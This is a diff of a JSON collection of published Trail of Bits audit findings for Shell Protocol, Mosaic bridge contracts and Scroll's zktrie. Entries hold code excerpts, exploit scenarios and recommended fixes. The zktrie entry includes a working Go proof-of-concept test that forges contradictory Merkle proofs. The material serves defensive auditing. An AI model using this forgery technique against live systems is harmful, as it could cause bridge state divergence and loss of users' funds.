onlyOwnerOrRelayer returns ( bool success, bytes memory returnData) { require ( IMsgReceiverFactory(msgReceiverFactory).whitelistedFeeTokens(_feeToken), \"Fee token is not whitelisted\" ); require (!forwarded[_id], \"call already forwared\" ); //approve tokens to _contract IERC20(_token).safeIncreaseAllowance(_contract, _amount); // solhint-disable-next-line avoid-low-level-calls (success, returnData) = _contract.call{value: msg.value }(_data); require (success, \"Failed to forward function call\" ); uint256 balance = IERC20(_feeToken).balanceOf( address ( this )); require (balance >= _feeAmount, \"Not enough tokens for the fee\" ); forwarded[_id] = true ; IERC20(_feeToken).transfer(_feeReceiver, _feeAmount); } Figure 13.1: The approveERC20TokenAndForwardCall function in M sgReceiver:98-123 This validation should be performed before the MsgSender contract emits the related event (gure 13.2). This is because the relayer will act upon the emitted event on the receiving chain regardless of whether _feeToken is set to a whitelisted token. function registerCrossFunctionCallWithTokenApproval( uint256 _chainId, address _destinationContract, address _feeToken, address _token, uint256 _amount, bytes calldata _methodData ) { external override nonReentrant onlyWhitelistedNetworks(_chainId) onlyUnpausedNetworks(_chainId) whenNotPaused bytes32 id = _generateId(); //shouldn't happen require (hasBeenForwarded[id] == false , \"Call already forwarded\" ); require (lastForwardedCall != id, \"Forwarded last time\" ); lastForwardedCall = id; hasBeenForwarded[id] = true ; emit ForwardCallWithTokenApproval( msg.sender , id, _chainId, _destinationContract, _feeToken , _token, _amount, _methodData ); } Figure 13.2: The registerCrossFunctionCallWithTokenApproval function in M sgSender:169-203 Exploit Scenario On Arbitrum, a low-fee network, Eve creates a theoretically innite series of transactions to be sent to MsgSender , with _feeToken set to a token that she knows is not whitelisted. The relayer relays the series of message calls to a MsgReceiver contract on Ethereum, a high-fee network, and all of the transactions revert. However, the relayer has to pay the intrinsic gas cost for each transaction, with no repayment, while allowing its internal queue to be lled up with malicious transactions. Recommendations Short term, move the logic for token whitelisting and validation to the MsgSender contract. Long term, analyze the implications of the ability to create numerous message calls on low-fee networks and its impact on relayer performance.", + "title": "4. Project dependencies contain vulnerabilities ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/ShellProtocolv2.pdf", + "body": "Although dependency scans did not identify a direct threat to the project under review, npm and yarn audit identied dependencies with known vulnerabilities. Due to the sensitivity of the deployment code and its environment, it is important to ensure that dependencies are not malicious. Problems with dependencies in the JavaScript community could have a signicant eect on the repository under review. The output below details these issues: CVE ID", "labels": [ "Trail of Bits", - "Severity: Low", - "Difficulty: Medium" + "Severity: Medium", + "Difficulty: Low" ] }, { - "title": "14. Active liquidity providers can set arbitrary _tokenOut values when withdrawing liquidity ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/AdvancedBlockchainQ12022.pdf", - "body": "An active liquidity provider (LP) can move his or her liquidity into any token, even one that the LP controls. When a relayer acts upon a WithdrawRequest event triggered by an active LP, the MosaicVault contract checks only that the address of _tokenOut (the token being requested) is not the zero address (gure 14.1). Outside of that constraint, _tokenOut can eectively be set to any token, even one that might have vulnerabilities. function _withdraw( address _accountTo, uint256 _amount, address _tokenIn, address _tokenOut, uint256 _amountOutMin, WithdrawData calldata _withdrawData, bytes calldata _data ) internal onlyWhitelistedToken(_tokenIn) validAddress(_tokenOut) nonReentrant onlyOwnerOrRelayer whenNotPaused returns ( uint256 withdrawAmount) Figure 14.1: The signature of the _withdraw function in M osaicVault:404-419 This places the burden of ensuring the swaps success on the decentralized exchange, and, as the application grows, can lead to unintended code behavior. Exploit Scenario Eve, a malicious active LP, is able to trigger undened behavior in the system by setting _tokenOut to a token that is vulnerable to exploitation. Recommendations Short term, analyze the implications of allowing _tokenOut to be set to an arbitrary token. Long term, validate the assumptions surrounding the lack of limits on _tokenOut as the codebase grows, and review our Token Integration Checklist to identify any related pitfalls. References imBTC Uniswap Hack", + "title": "5. Use of duplicate functions ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/ShellProtocolv2.pdf", + "body": "The ProteusLogic and Proteus contracts both contain a function used to update the internal slices array. Although calls to these functions currently lead to identical outcomes, there is a risk that a future update could be applied to one function but not the other, which would be problematic. < function _updateSlices(int128[] memory slopes, int128[] memory rootPrices) internal { < require(slopes.length == rootPrices.length); < require(slopes.length > 1); --- > function _updateSlices(int128[] memory slopes, int128[] memory rootPrices) > internal > { > if (slopes.length != rootPrices.length) { > revert UnequalArrayLengths(); > } > if (slopes.length < 2) { > revert TooFewParameters(); > } Figure 5.1: The di between the ProteusLogic and Proteus contracts _updateSlices() functions Using duplicate functions in dierent contracts is not best practice. It increases the risk of a divergence between the contracts and could signicantly aect the system properties. Dening a function in one contract and having other contracts call that function is less risky. Exploit Scenario Alice, a developer of the Shell Protocol, is tasked with updating the ProteusLogic contract. The update requires a change to the Proteus._updateSlices function. However, Alice forgets to update the ProteusLogic._updateSlices function. Because of this omission, the functions updates to the internal slices array may produce dierent results. Recommendations Short term, select one of the two _updateSlices functions to retain in the codebase and to maintain going forward. Long term, consider consolidating the Proteus and ProteusLogic contracts into a single implementation, and avoid duplicating logic.", "labels": [ "Trail of Bits", "Severity: Informational", @@ -3332,169 +6020,179 @@ ] }, { - "title": "15. Withdrawal assumptions may lead to transfers of an incorrect token ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/AdvancedBlockchainQ12022.pdf", - "body": "The CurveTricryptoStrategy contract manages liquidity in Curve pools and facilitates transfers of tokens between chains. While it is designed to work with one curve vault, the vault can be set to an arbitrary pool. Thus, the contract should not make assumptions regarding the pool without validation. Each pool contains an array of tokens specifying the tokens to withdraw from that pool. However, when the vault address is set in the constructor of CurveTricryptoConfig , the pools address is not checked against the TriCrypto pools address. The token at index 2 in the coins array is assumed to be wrapped ether (WETH), as indicated by the code comment shown in gure 15.1. If the conguration is incorrect, a dierent token may be unintentionally transferred. if (unwrap) { //unwrap LP into weth transferredToken = tricryptoConfig.tricryptoLPVault().coins( 2 ); [...] Figure 15.1: Part of the transferLPs function in CurveTricryptoStrategy .sol:377-379 Exploit Scenario The Curve pool array, coins , stores an address other than that of WETH in index 2. As a result, a user mistakenly sends the wrong token in a transfer. Recommendations Short term, have the constructor of CurveTricryptoConfig or the transferLPs function validate that the address of transferredToken is equal to the address of WETH. Long term, validate data from external contracts, especially data involved in the transfer of funds.", + "title": "6. Certain identity curve congurations can lead to a loss of pool tokens ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/ShellProtocolv2.pdf", + "body": "A rounding error in an integer division operation could lead to a loss of pool tokens and the dilution of liquidity provider (LP) tokens. We reimplemented certain of Cowri Labss fuzz tests and used Echidna to test the system properties specied in the Automated Testing section. The original fuzz testing used a xed amount of 100 tokens for the initial xBalance and yBalance values; after we removed that limitation, Echidna was able to break some of the invariants. The Shell Protocol team should identify the largest possible percentage decrease in pool utility or utility per shell (UPS) to better quantify the impact of a broken invariant on system behavior. In some of the breaking cases, the ratio of token balances, m, was close to the X or Y asymptote of the identity curve. This means that an attacker might be able to disturb the balance of the pool (through ash minting or a large swap, for example) and then exploit the broken invariants. Exploit Scenario Alice withdraws USD 100 worth of token X from a Proteus-based liquidity pool by burning her LP tokens. She eventually decides to reenter the pool and to provide the same amount of liquidity. Even though the curves conguration is similar to the conguration at the time of her withdrawal, her deposit leads to only a USD 90 increase in the pools balance of token X; thus, Alice receives fewer LP tokens than she should in return, eectively losing money because of an arithmetic error. Recommendations Short term, investigate the root cause of the failing properties. Document and test the expected rounding direction (up or down) of each arithmetic operation, and ensure that the rounding direction used in each operation benets the pool. Long term, implement the fuzz testing recommendations outlined in appendix C.", "labels": [ "Trail of Bits", - "Severity: Medium", - "Difficulty: High" + "Severity: High", + "Difficulty: Undetermined" ] }, { - "title": "16. Improper validation of Chainlink data ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/AdvancedBlockchainQ12022.pdf", - "body": "The latestRoundData function returns a signed integer that is coerced to an unsigned integer without checking that the value is positive. An overow (e.g., uint(-1) ) would result in drastic misrepresentation of the price and unexpected behavior. In addition, ChainlinkLib does not ensure the completeness or recency of round data, so pricing data may not reect recent changes. It is best practice to dene a window in which data is considered suciently recent (e.g., within a minute of the last update) by comparing the block timestamp to updatedAt . (, int256 price , , , ) = _aggregator.latestRoundData(); return uint256 (price); Figure 16.1: Part of the getCurrentTokenPrice function in ChainlinkLib.sol:113-114 Recommendations Short term, have latestRoundData and similar functions verify that values are non-negative before converting them to unsigned integers, and add an invariant require(updatedAt != 0 && answeredInRound == roundID) to ensure that the round has nished and that the pricing data is from the current round. Long term, dene a minimum update threshold and add the following check: require((block.timestamp - updatedAt <= minThreshold) && (answeredInRound == roundID)) .", + "title": "7. Lack of events for critical operations ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/ShellProtocolv2.pdf", + "body": "Two critical operations do not trigger events. As a result, it will be dicult to review the correct behavior of the contracts once they have been deployed. The LiquidityPoolProxy contracts setImplementation function is called to set the implementation address of the liquidity pool and does not emit an event providing conrmation of that operation to the contracts caller (gure 7.1). function setImplementation(address _implementation) external onlyOwner { } implementation = ILiquidityPoolImplementation(_implementation); Figure 7.1: The setImplementation() function in LiquidityPoolProxy.sol#L2833 Calls to the updateSlices function in the Proteus contract do not trigger events either (gure 7.2). This is problematic because updates to the slices array have a signicant eect on the conguration of the identity curve (TOB-SHELL-1). function updateSlices(int128[] memory slopes, int128[] memory rootPrices) external onlyOwner { } _updateSlices(slopes, rootPrices); Figure 7.2: The updateSlices() function in Proteus.sol#L623628 Without events, users and blockchain-monitoring systems cannot easily detect suspicious behavior. Exploit Scenario Eve, an attacker, is able to take ownership of the LiquidityPoolProxy contract. She then sets a new implementation address. Alice, a Shell Protocol team member, is unaware of the change and does not raise a security incident. Recommendations Short term, add events for all critical operations that result in state changes. Events aid in contract monitoring and the detection of suspicious behavior. Long term, consider using a blockchain-monitoring system to track any suspicious behavior in the contracts. The system relies on several contracts to behave as expected. A monitoring mechanism for critical events would quickly detect any compromised system components.", "labels": [ "Trail of Bits", - "Severity: Informational", - "Difficulty: High" + "Severity: Medium", + "Difficulty: Low" ] }, { - "title": "25. Incorrect safeIncreaseAllowance() amount can cause invest() calls to revert ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/AdvancedBlockchainQ12022.pdf", - "body": "Calls to make investments through Sushiswap can revert because the sushiSwapRouter may not have the token allowances needed to fulll the requests. The owner of the MosaicHolding contract is responsible for investing user-deposited funds in investment strategies. The contract owner does this by calling the contracts invest() function, which then calls makeInvestment() on the investment strategy meant to receive the funds (gure 25.1). function invest ( IInvestmentStrategy.Investment[] calldata _investments, address _investmentStrategy , bytes calldata _data ) external override onlyAdmin validAddress(_investmentStrategy) { require (investmentStrategies[_investmentStrategy], \"ERR: STRATEGY NOT SET\" ); uint256 investmentsLength = _investments.length; address contractAddress = address ( this ); for ( uint256 i ; i < investmentsLength; i++) { IInvestmentStrategy.Investment memory investment = _investments[i]; require (investment.amount != 0 && investment.token != address ( 0 ), \"ERR: TOKEN AMOUNT\" ); IERC20Upgradeable token = IERC20Upgradeable(investment.token); require (token.balanceOf(contractAddress) >= investment.amount, \"ERR: BALANCE\" ); token.safeApprove(_investmentStrategy, investment.amount); } uint256 mintedTokens = IInvestmentStrategy(_investmentStrategy).makeInvestment( _investments, _data ); emit FoundsInvested(_investmentStrategy, msg.sender , mintedTokens); } Figure 25.1: The invest function in MosaicHolding:190- To deposit funds into the SushiswapLiquidityProvider investment strategy, the contract must increase the sushiSwapRouter s approval limits to account for the tokenA and tokenB amounts to be transferred. However, tokenB s approval limit is increased only to the amount of the tokenA investment (gure 25.2). function makeInvestment (Investment[] calldata _investments, bytes calldata _data) external override onlyInvestor nonReentrant returns ( uint256 ) { Investment memory investmentA = _investments[ 0 ]; Investment memory investmentB = _investments[ 1 ]; IERC20Upgradeable tokenA = IERC20Upgradeable(investmentA.token); IERC20Upgradeable tokenB = IERC20Upgradeable(investmentB.token); tokenA.safeTransferFrom( msg.sender , address ( this ), investmentA.amount); tokenB.safeTransferFrom( msg.sender , address ( this ), investmentB.amount); tokenA.safeIncreaseAllowance( address (sushiSwapRouter), investmentA.amount); tokenB.safeIncreaseAllowance( address (sushiSwapRouter), investmentA.amount); ( uint256 deadline , uint256 minA , uint256 minB ) = abi.decode( _data, ( uint256 , uint256 , uint256 ) ); (, , uint256 liquidity ) = sushiSwapRouter.addLiquidity( investmentA.token, investmentB.token, investmentA.amount, investmentB.amount, minA, minB, address ( this ), deadline ); return liquidity; } Figure 25.2: The makeInvestment function in SushiswapLiquidityProvider : 52-85 If the amount of tokenB to be deposited is greater than that of tokenA , sushiSwapRouter will fail to transfer the tokens, and the transaction will revert. Exploit Scenario Alice, the owner of the MosaicHolding contract, wishes to invest liquidity in a Sushiswap liquidity pool. The amount of the tokenB investment is greater than that of tokenA . The sushiSwapRouter does not have the right token allowances for the transaction, and the investment request fails. Recommendations Short term, change the amount value used in the safeIncreaseAllowance() call from investmentA.amount to investmentB.amount . Long term, review the codebase to identify similar issues. Additionally, create a more extensive test suite capable of testing edge cases that may invalidate system assumptions.", + "title": "8. Ocean may accept unexpected airdrops ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/ShellProtocolv2.pdf", + "body": "Unexpected transfers of tokens to the Ocean contract may break its internal accounting, essentially leading to the loss of the transferred asset. To mitigate this risk, Ocean attempts to reject airdrops. Per the ERC721 and ERC1155 standards, contracts must implement specic methods to accept or deny token transfers. To do this, the Ocean contract uses the onERC721Received and onERC1155Received callbacks and _ERC1155InteractionStatus and _ERC721InteractionStatus storage ags. These storage ags are enabled in ERC721 and ERC1155 wrapping operations to facilitate successful standard-compliant transfers. However, the _erc721Unwrap and _erc1155Unwrap functions also enable the _ERC721InteractionStatus and _ERC1155InteractionStatus ags, respectively. Enabling these ags allows for airdrops, since the Ocean contract, not the user, is the recipient of the tokens in unwrapping operations. function _erc721Unwrap( address tokenAddress, uint256 tokenId, address userAddress, uint256 oceanId ) private { _ERC721InteractionStatus = INTERACTION; IERC721(tokenAddress).safeTransferFrom( address(this), userAddress, tokenId ); _ERC721InteractionStatus = NOT_INTERACTION; emit Erc721Unwrap(tokenAddress, tokenId, userAddress, oceanId); } Figure 8.1: The _erc721Unwrap() function in Ocean.sol#L1020- Exploit Scenario Alice calls the _erc721Unwrap function. When the onERC721Received callback function in Alices contract is called, Alice mistakenly sends the ERC721 tokens back to the Ocean contract. As a result, her ERC721 is permanently locked in the contract and eectively burned. Recommendations Short term, disallow airdrops of standard-compliant tokens during unwrapping interactions and document the edge cases in which the Ocean contract will be unable to stop token airdrops. Long term, when the Ocean contract is expecting a specic airdrop, consider storing the originating address of the transfer and the token type alongside the relevant interaction ag.", "labels": [ "Trail of Bits", - "Severity: Low", - "Difficulty: High" + "Severity: Informational", + "Difficulty: Low" ] }, { - "title": "17. Incorrect check of token status in the providePassiveLiquidity function ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/AdvancedBlockchainQ12022.pdf", - "body": "A passive LP can provide liquidity in the form of a token that is not whitelisted. The providePassiveLiquidity() function in MosaicVault is called by users who wish to participate in the Mosaic system as passive LPs. As part of the functions execution, it checks whether there is a ReceiptToken associated with the _tokenAddress input parameter (gure 17.1). This is equivalent to checking whether the token is whitelisted by the system. function providePassiveLiquidity( uint256 _amount, address _tokenAddress) external payable override nonReentrant whenNotPaused { require (_amount > 0 || msg.value > 0 , \"ERR: AMOUNT\" ); if ( msg.value > 0 ) { require ( vaultConfig.getUnderlyingIOUAddress(vaultConfig.wethAddress()) != address ( 0 ), \"ERR: WETH NOT WHITELISTED\" ); _provideLiquidity( msg.value , vaultConfig.wethAddress(), 0 ); } else { require (_tokenAddress != address ( 0 ), \"ERR: INVALID TOKEN\" ); require ( vaultConfig.getUnderlyingIOUAddress(_tokenAddress) != address ( 0 ), \"ERR: TOKEN NOT WHITELISTED\" ); _provideLiquidity(_amount, _tokenAddress, 0 ); } } Figure 17.1: The providePassiveLiquidity function in MosaicVault:127-149 However, providePassiveLiquidity() uses an incorrect function call to check the whitelist status. Instead of calling getUnderlyingReceiptAddress() , it calls getUnderlyingIOUAddress() . The same issue occurs in checks of WETH deposits. Exploit Scenario Eve decides to deposit liquidity in the form of a token that is whitelisted only for active LPs. The token provides a higher yield than the tokens whitelisted for passive LPs. This may enable Eve to receive a higher annual percentage yield on her deposit than other passive LPs in the system receive on theirs. Recommendations Short term, change the function called to validate tokenAddress and wethAddress from getUnderlyingIOUAddress() to getUnderlyingReceiptAddress() . Long term, take the following steps: Review the codebase to identify similar errors. Consider whether the assumption that the same tokens will be whitelisted for both passive and active LPs will hold in the future. Create a more extensive test suite capable of testing edge cases that may invalidate system assumptions.", + "title": "1. Lack of domain separation allows proof forgery ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2023-07-scroll-zktrie-securityreview.pdf", + "body": "Merkle trees are nested tree data structures in which the hash of each branch node depends upon the hashes of its children. The hash of each node is then assumed to uniquely represent the subtree of which that node is a root. However, that assumption may be false if a leaf node can have the same hash as a branch node. A general method for preventing leaf and branch nodes from colliding in this way is domain separation. That is, given a hash function , dene the hash of a leaf to be and the hash of a branch to be return the same result (perhaps because s return values all start with the byte 0 and s all start with the byte 1). Without domain separation, a malicious entity may be able to insert a leaf into the tree that can be later used as a branch in a Merkle path. , where and are encoding functions that can never ((_)) ((_)) In zktrie, the hash for a node is dened by the NodeHash method, shown in gure 1.1. As shown in the highlighted portions, the hash of a branch node is HashElems(n.ChildL,n.ChildR), while the hash of a leaf node is HashElems(1,n.NodeKey,n.valueHash). // LeafHash computes the key of a leaf node given the hIndex and hValue of the // entry of the leaf. func LeafHash(k, v *zkt.Hash) (*zkt.Hash, error) { return zkt.HashElems(big.NewInt(1), k.BigInt(), v.BigInt()) } // NodeHash computes the hash digest of the node by hashing the content in a // specific way for each type of node. // Merkle tree for each node. func (n *Node) NodeHash() (*zkt.Hash, error) { This key is used as the hash of the if n.nodeHash == nil { // Cache the key to avoid repeated hash computations. // NOTE: We are not using the type to calculate the hash! switch n.Type { case NodeTypeParent: // H(ChildL || ChildR) var err error n.nodeHash, err = zkt.HashElems(n.ChildL.BigInt(), n.ChildR.BigInt()) if err != nil { return nil, err } case NodeTypeLeaf: n.ValuePreimage) var err error n.valueHash, err = zkt.PreHandlingElems(n.CompressedFlags, if err != nil { return nil, err } n.nodeHash, err = LeafHash(n.NodeKey, n.valueHash) if err != nil { return nil, err } case NodeTypeEmpty: // Zero n.nodeHash = &zkt.HashZero default: n.nodeHash = &zkt.HashZero } } return n.nodeHash, nil } Figure 1.1: NodeHash and LeafHash (zktrie/trie/zk_trie_node.go#118156) The function HashElems used here performs recursive hashing in a binary-tree fashion. For the purpose of this nding, the key property is that HashElems(1,k,v) == H(H(1,k),v) and HashElems(n.ChildL,n.ChildR) == H(n.ChildL,n.ChildR), where H is the global two-input, one-output hash function. Therefore, a branch node b and a leaf node l where b.ChildL == H(1,l.NodeKey) and b.ChildR == l.valueHash will have equal hash values. This allows proof forgery and, for example, a malicious entity to insert a key that can be proved to be both present and nonexistent in the tree, as illustrated by the proof-of-concept test in gure 1.2. func TestMerkleTree_ForgeProof(t *testing.T) { zkTrie := newTestingMerkle(t, 10) t.Run(\"Testing for malicious proofs\", func(t *testing.T) { // Find two distinct values k1,k2 such that the first step of // the path has the sibling on the LEFT (i.e., path[0] == // false) k1, k2 := (func() (zkt.Byte32, zkt.Byte32) { k1 := zkt.Byte32{1} k2 := zkt.Byte32{2} k1_hash, _ := k1.Hash() k2_hash, _ := k2.Hash() for !getPath(1, zkt.NewHashFromBigInt(k1_hash)[:])[0] { for i := len(k1); i > 0; i -= 1 { k1[i-1] += 1 if k1[i-1] != 0 { break } } k1_hash, _ = k1.Hash() } zkt.NewHashFromBigInt(k2_hash)[:])[0] { for k1 == k2 || !getPath(1, for i := len(k2); i > 0; i -= 1 { k2[i-1] += 1 if k2[i-1] != 0 { break } } k2_hash, _ = k2.Hash() } return k1, k2 })() k1_hash_int, _ := k1.Hash() k2_hash_int, _ := k2.Hash() k1_hash := zkt.NewHashFromBigInt(k1_hash_int) k2_hash := zkt.NewHashFromBigInt(k2_hash_int) // create a dummy value for k2, and use that to craft a // malicious value for k1 k2_value := (&[2]zkt.Byte32{{2}})[:] k1_value, _ := NewLeafNode(k2_hash, 1, k2_value).NodeHash() []zkt.Byte32{*zkt.NewByte32FromBytes(k1_value.Bytes())} k1_value_array := // insert k1 into the trie with the malicious value assert.Nil(t, zkTrie.TryUpdate(zkt.NewHashFromBigInt(k1_hash_int), 0, k1_value_array)) getNode := func(hash *zkt.Hash) (*Node, error) { return zkTrie.GetNode(hash) } // query an inclusion proof for k1 k1Proof, _, err := BuildZkTrieProof(zkTrie.rootHash, k1_hash_int, 10, getNode) assert.Nil(t, err) assert.True(t, k1Proof.Existence) // check that inclusion proof against our root hash k1_val_hash, _ := NewLeafNode(k1_hash, 0, k1_value_array).NodeHash() k1Proof_root, _ := k1Proof.Verify(k1_val_hash, k1_hash) assert.Equal(t, k1Proof_root, zkTrie.rootHash) // forge a non-existence proof fakeNonExistProof := *k1Proof fakeNonExistProof.Existence = false // The new non-existence proof needs one extra level, where // the sibling hash is H(1,k1_hash) fakeNonExistProof.depth += 1 zkt.SetBitBigEndian(fakeNonExistProof.notempties[:], fakeNonExistProof.depth-1) fakeSibHash, _ := zkt.HashElems(big.NewInt(1), k1_hash_int) fakeNonExistProof.Siblings = append(fakeNonExistProof.Siblings, fakeSibHash) // Construct the NodeAux details for the malicious leaf k2_value_hash, _ := zkt.PreHandlingElems(1, k2_value) k2_nodekey := zkt.NewHashFromBigInt(k2_hash_int) fakeNonExistProof.NodeAux = &NodeAux{Key: k2_nodekey, Value: k2_value_hash} // Check our non-existence proof against the root hash fakeNonExistProof_root, _ := fakeNonExistProof.Verify(k1_val_hash, assert.Equal(t, fakeNonExistProof_root, zkTrie.rootHash) // fakeNonExistProof and k1Proof prove opposite things. k1 // is both in and not-in the tree! assert.NotEqual(t, fakeNonExistProof.Existence, k1Proof.Existence) k1_hash) }) } Figure 1.2: A proof-of-concept test case for proof forgery Exploit Scenario Suppose Alice uses the zktrie to implement the Ethereum account table in a zkEVM-based bridge with trustless state updates. Bob submits a transaction that inserts specially crafted account data into some position in that tree. At a later time, Bob submits a transaction that depends on the result of an account table lookup. Bob generates two contradictory Merkle proofs and uses those proofs to create two zkEVM execution proofs that step to dierent nal states. By submitting one proof each to the opposite sides of the bridge, Bob causes state divergence and a loss of funds. Recommendations Short term, modify NodeHash to domain-separate leaves and branches, such as by changing the branch hash to zkt.HashElems(big.NewInt(2),n.ChildL.BigInt(), n.ChildR.BigInt()). Long term, fully document all data structure designs and requirements, and review all assumptions to ensure that they are well founded.", "labels": [ "Trail of Bits", - "Severity: Informational", - "Difficulty: High" + "Severity: High", + "Difficulty: Medium" ] }, { - "title": "18. Solidity compiler optimizations can be problematic ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/AdvancedBlockchainQ12022.pdf", - "body": "The Composable Finance contracts have enabled optional compiler optimizations in Solidity. There have been several optimization bugs with security implications. Moreover, optimizations are actively being developed . Solidity compiler optimizations are disabled by default, and it is unclear how many contracts in the wild actually use them. Therefore, it is unclear how well they are being tested and exercised. High-severity security issues due to optimization bugs have occurred in the past . A high-severity bug in the emscripten -generated solc-js compiler used by True and Remix persisted until late 2018. The x for this bug was not reported in the Solidity CHANGELOG. Another high-severity optimization bug resulting in incorrect bit shift results was patched in Solidity 0.5.6 . More recently, another bug due to the incorrect caching of keccak256 was reported. A compiler audit of Solidity from November 2018 concluded that the optional optimizations may not be safe . It is likely that there are latent bugs related to optimization and that new bugs will be introduced due to future optimizations. Exploit Scenario A latent or future bug in Solidity compiler optimizationsor in the Emscripten transpilation to solc-js causes a security vulnerability in the Composable Finance contracts. Recommendations Short term, measure the gas savings from optimizations and carefully weigh them against the possibility of an optimization-related bug. Long term, monitor the development and adoption of Solidity compiler optimizations to assess their maturity.", + "title": "2. Lack of proof validation causes denial of service on the verier ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2023-07-scroll-zktrie-securityreview.pdf", + "body": "The Merkle tree proof verier assumes several well-formedness properties about the received proof and node arguments. If at least one of these properties is violated, the verier will have a runtime error. The rst property that must hold is that the node associated with the Merkle proof must be a leaf node (i.e., must contain a non-nil NodeKey eld). If this is not the case, computing the rootFromProof for a nil NodeKey will cause a panic when computing the getPath function. Secondly, the Proof elds must be guaranteed to be consistent with the other elds. Assuming that the proof depth is correct will cause out-of-bounds accesses to both the NodeKey and the notempties eld. Finally, the Siblings array length should also be validated; for example, the VerifyProofZkTrie will panic due to an out-of-bounds access if the proof.Siblings eld is empty (highlighted in yellow in the rootFromProof function). // VerifyProof verifies the Merkle Proof for the entry and root. func VerifyProofZkTrie(rootHash *zkt.Hash, proof *Proof, node *Node) bool { nodeHash, err := node.NodeHash() if err != nil { return false } rootFromProof, err := proof.Verify(nodeHash, node.NodeKey) if err != nil { return false } return bytes.Equal(rootHash[:], rootFromProof[:]) } // Verify the proof and calculate the root, nodeHash can be nil when try to verify // a nonexistent proof func (proof *Proof) Verify(nodeHash, nodeKey *zkt.Hash) (*zkt.Hash, error) { if proof.Existence { if nodeHash == nil { return nil, ErrKeyNotFound } return proof.rootFromProof(nodeHash, nodeKey) } else { if proof.NodeAux == nil { return proof.rootFromProof(&zkt.HashZero, nodeKey) } else { if bytes.Equal(nodeKey[:], proof.NodeAux.Key[:]) { return nil, fmt.Errorf(\"non-existence proof being checked against hIndex equal to nodeAux\") } midHash, err := LeafHash(proof.NodeAux.Key, proof.NodeAux.Value) if err != nil { return nil, err } return proof.rootFromProof(midHash, nodeKey) } } } func (proof *Proof) rootFromProof(nodeHash, nodeKey *zkt.Hash) (*zkt.Hash, error) { var err error sibIdx := len(proof.Siblings) - 1 path := getPath(int(proof.depth), nodeKey[:]) var siblingHash *zkt.Hash for lvl := int(proof.depth) - 1; lvl >= 0; lvl-- { if zkt.TestBitBigEndian(proof.notempties[:], uint(lvl)) { siblingHash = proof.Siblings[sibIdx] sibIdx-- } else { siblingHash = &zkt.HashZero } if path[lvl] { nodeHash, err = NewParentNode(siblingHash, nodeHash).NodeHash() if err != nil { return nil, err } } else { nodeHash, err = NewParentNode(nodeHash, siblingHash).NodeHash() if err != nil { return nil, err } } } return nodeHash, nil } Figure 2.1: zktrie/trie/zk_trie_impl.go#595 Exploit Scenario An attacker crafts an invalid proof that causes the proof verier to crash, causing a denial of service in the system. Recommendations Short term, validate the proof structure before attempting to use its values. Add fuzz testing to the VerifyProofZkTrie function. Long term, add extensive tests and fuzz testing to functions interfacing with attacker-controlled values.", "labels": [ "Trail of Bits", "Severity: Medium", - "Difficulty: High" + "Difficulty: Low" ] }, { - "title": "19. Lack of contract documentation ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/AdvancedBlockchainQ12022.pdf", - "body": "The codebases lack code documentation, high-level descriptions, and examples, making the contracts dicult to review and increasing the likelihood of user mistakes. The CrosslayerPortal codebase would benet from additional documentation, including on the following: The logic responsible for setting the roles in the core and the reason for the manipulation of indexes The incoming function arguments and the values used on source chains and destination chains The arithmetic involved in reward calculations and the relayers distribution of tokens The checks performed by the o-chain components, such as the relayer and the rebalancing bot The third-party integrations The rebalancing arithmetic and calculations There should also be clear NatSpec documentation on every function, identifying the unit of each variable, the functions intended use, and the functions safe values. The documentation should include all expected properties and assumptions relevant to the aforementioned aspects of the codebase. Recommendations Short term, review and properly document the aforementioned aspects of the codebase. Long term, consider writing a formal specication of the protocol.", + "title": "3. Two incompatible ways to generate proofs ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2023-07-scroll-zktrie-securityreview.pdf", + "body": "There are two incompatible ways to generate proofs. The rst implementation (gure 3.1) writes to a given callback, eectively returning []bytes. It does not have a companion verication function; it has only positive tests (zktrie/trie/zk_trie_test.go#L93-L125); and it is accessible from the C function TrieProve and the Rust function prove. The second implementation (gure 3.2) returns a pointer to a Proof struct. It has a companion verication function (zktrie/trie/zk_trie_impl.go#L595-L632); it has positive and negative tests (zktrie/trie/zk_trie_impl_test.go#L484-L537); and it is not accessible from C or Rust. // Prove is a simlified calling of ProveWithDeletion func (t *ZkTrie) Prove(key []byte, fromLevel uint, writeNode func(*Node) error) error { return t.ProveWithDeletion(key, fromLevel, writeNode, nil) } // ProveWithDeletion constructs a merkle proof for key. The result contains all encoded nodes // on the path to the value at key. The value itself is also included in the last // node and can be retrieved by verifying the proof. // // If the trie does not contain a value for key, the returned proof contains all // nodes of the longest existing prefix of the key (at least the root node), ending // with the node that proves the absence of the key. // // If the trie contain value for key, the onHit is called BEFORE writeNode being called, // both the hitted leaf node and its sibling node is provided as arguments so caller // would receive enough information for launch a deletion and calculate the new root // base on the proof data // Also notice the sibling can be nil if the trie has only one leaf func (t *ZkTrie) ProveWithDeletion(key []byte, fromLevel uint, writeNode func(*Node) error, onHit func(*Node, *Node)) error { [...] } Figure 3.1: The rst way to generate proofs (zktrie/trie/zk_trie.go#143164) // Proof defines the required elements for a MT proof of existence or // non-existence. type Proof struct { // existence indicates wether this is a proof of existence or // non-existence. Existence bool // depth indicates how deep in the tree the proof goes. depth uint // notempties is a bitmap of non-empty Siblings found in Siblings. notempties [zkt.HashByteLen - proofFlagsLen]byte // Siblings is a list of non-empty sibling node hashes. Siblings []*zkt.Hash // NodeAux contains the auxiliary information of the lowest common ancestor // node in a non-existence proof. NodeAux *NodeAux } // BuildZkTrieProof prove uniformed way to turn some data collections into Proof struct func BuildZkTrieProof(rootHash *zkt.Hash, k *big.Int, lvl int, getNode func(key *zkt.Hash) (*Node, error)) (*Proof, *Node, error) { [...] } Figure 3.2: The second way to generate proofs (zktrie/trie/zk_trie_impl.go#531551) Recommendations Short term, decide on one implementation and remove the other 